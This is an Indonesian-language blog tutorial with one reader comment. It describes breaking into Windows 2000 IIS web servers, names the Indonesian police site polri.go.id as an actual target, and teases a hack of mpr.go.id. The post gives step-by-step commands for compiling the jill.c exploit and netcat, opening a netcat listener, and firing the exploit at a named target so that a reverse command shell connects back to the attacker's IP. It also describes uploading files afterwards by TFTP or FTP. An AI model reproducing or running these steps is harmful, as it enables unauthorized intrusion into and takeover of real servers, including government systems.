Hacking WebServer W2K
Pake *nix ( polri.go.id )
Dalam kesempatan kali
ini saya ingin menulis sedikit tentang hacking WebServer Windows 2000 dengan
unix. Awalnya dari www.polri.go.id ditemukan lobangnya dengan unicode, tetapi
unicode saja tidak mampu untuk menulis didalam file index.html karena selain tershadow,
read only, rupanya terencrypt pula dengan HTML-Encrypt. Maka itu saya ingin
memperkenalkan hacking Win2000 dengan unix, mungkin baru tapi kita coba saja.
Beberapa hal yang
harus diperhatikan sebelum hacking Windows 2000 :
- Webservernya pake
OS Windows 2000 dan terpasang web printing (terpasang secara default)
- Tidak ada
firewall/Firewall yang membolehkan outbond connection ke suatu port (Besar
sekali peluang suatu webserver tidak memiliki firewall atau mensetup firewall
dengan benar, dengan melihat persentase jumlah webserver yang ada dan kondisi
firewall yang dimiliki.
- Cracker memiliki
exploit (jill.c) dan program yang dapat menjalankan secara listening mode
(netcat).
Terus nich exploit
bisa di pake di shell *nix terserah yang penting berbasis *nic, ya iyalah..
kan.. lagi ngebahas hacking lewat unix masa pake tools iis, heuhehuehue :P Coba
searching di http://www.yahoo.com | http://www.google.com | atau |
http://published.localbox.net untuk
exploit win2k unix remote! Coba download, saya mengunakan exploit yang
sangat sederhana yakni jill.c dan NC100.TGZ, ok langsung konek ke shell! Belum
punya? Bagi Donk!! Enaknya.. Ini Shell bayar di shellindo.com belilah.. kalau
kamu ingin maju jangan carding mulu.
compile jill.c
$gcc jill.c -o jill
extract file
NC110.TGZ
$tar -xzvf NC110.TGZ
lalu compile NC
tersebut
$make generic
(sebenarnya
tergantung OS anda, tetapi biasanya command ini berhasil, jadi saya
menganjurkan menggunakan perintah ini saja bagi para newbie, jika command tadi
berhasil, maka akan muncul suatu file yang bernama nc, dan anda bisa
menjalankannya) Untuk menjalankan nc anda sebaiknya menggunakan root, karena
akses port yang di denied oleh *nix anda.
#nc -l -p
<port> -vv
misalkan saja port
yang anda sebutkan adalah 99, jadi perintahnya adalah nc -l -p 99 -vv
setelah ini anda
berganti window,dengan menekan <Alt+F2> atau menekan <Alt+F3> atau
yang lain.
Setelah berganti
window, anda login, dan jalankan jill
$./jill target port
attacker port
Misalkan situs
polisi-cyber.com menggunakan Windows 2000 dan menggunakan IIS 5 dan bisa
dihack, dan ip komputer kita adalah 202.152.14.5 maka yang akan kita ketikkan
adalah :
$./jill
polisi-cyber.com 80 202.152.14.5 99
jika sudah, kita
perlu berganti window yang sebelumnya dimana nc sedang dijalankan. tunggu
beberapa saat, dan akan muncul prompt command ala windows, maka anda telah
memiliki server abcd.com dan anda bebas melakukan apa saja.. (jika setelah
ditunggu beberapa saat tidak muncul command shell, anda dapat menekan
<enter>)
Hmmm, setelah kita
kerjai server tadi, lalu bagaimana? anda bisa melanjutkan dengan menggunakan
cara upload seperti unicode, bisa dengan menggunakan TFTP atau dengan FTP.
Lalu bagaimana jika
saya tidak memiliki root, saya memiliki account di addr.com Anda masih bisa
mengerjai situs tadi, anda jalankan dulu nc versi windows.
C:\nc -l -p 99 -vv
listening on [any] 99
...
dan anda menggunakan
shell anda dan jalankan jill di komputer shell tadi (contohnya addr.com)
File Lainnya :
NC110 NC11NT
Ok Sekain dari saya
untuk www.polri.go.id ? Pikir sendiri donk.. bocorannya kayak gitu.. masa
maunya disusuin terus.. heuhehuehue ok dech.. sampai ketemu di tutorial
berikutnya tentang hacking www.mpr.go.id, sampai gua masuk ke sell 3 hari 2
malam.. huehuehuehue :) Tapi nggak apa2, akhirnya gua bebas juga..
huehehuehuehuehue ok deh.. tapi jangan lupa berdoa dolo sebelum masuk penjara :v
Mantap :D
BalasHapus